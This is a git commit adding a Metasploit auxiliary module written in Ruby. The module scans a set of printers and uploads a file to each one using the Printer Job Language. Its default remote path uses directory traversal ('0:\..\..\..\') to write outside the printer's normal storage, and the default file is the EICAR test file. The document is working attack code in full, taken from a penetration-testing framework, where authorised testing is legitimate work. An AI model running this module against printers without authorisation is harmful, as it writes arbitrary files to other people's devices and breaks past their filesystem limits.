Add printer_upload_file module

bug/bundler_fix
William Vu 2015-02-25 14:58:17 -06:00
parent 26cbeb011b
commit 90d179e56f
1 changed files with 60 additions and 0 deletions

View File

@ -0,0 +1,60 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
require "rex/proto/pjl"
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
"Name" => "Printer File Upload Scanner",
"Description" => %q{
This module uploads a file to a set of printers using the
Printer Job Language (PJL) protocol.
},
"Author" => [
"wvu", # Rex::Proto::PJL and modules
"sinn3r", # RSpec tests
"MC", # Independent mixin and modules
"Myo Soe", # Independent modules
"Matteo Cantoni <goony[at]nothink.org>" # Independent modules
],
"References" => [
["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"]
],
"License" => MSF_LICENSE
))
register_options([
Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
OptPath.new("LPATH", [true, "Local path",
File.join(Msf::Config.data_directory, "eicar.com")]),
OptString.new("RPATH", [true, "Remote path", '0:\..\..\..\eicar.com'])
], self.class)
end
def run_host(ip)
lpath = datastore["LPATH"]
rpath = datastore["RPATH"]
connect
pjl = Rex::Proto::PJL::Client.new(sock)
pjl.begin_job
pjl.fsinit(rpath[0..1])
file = pjl.fsdownload(lpath, rpath)
pjl.end_job
disconnect
print_good("#{rhost}:#{rport} - Saved #{lpath} to #{rpath}")
end
end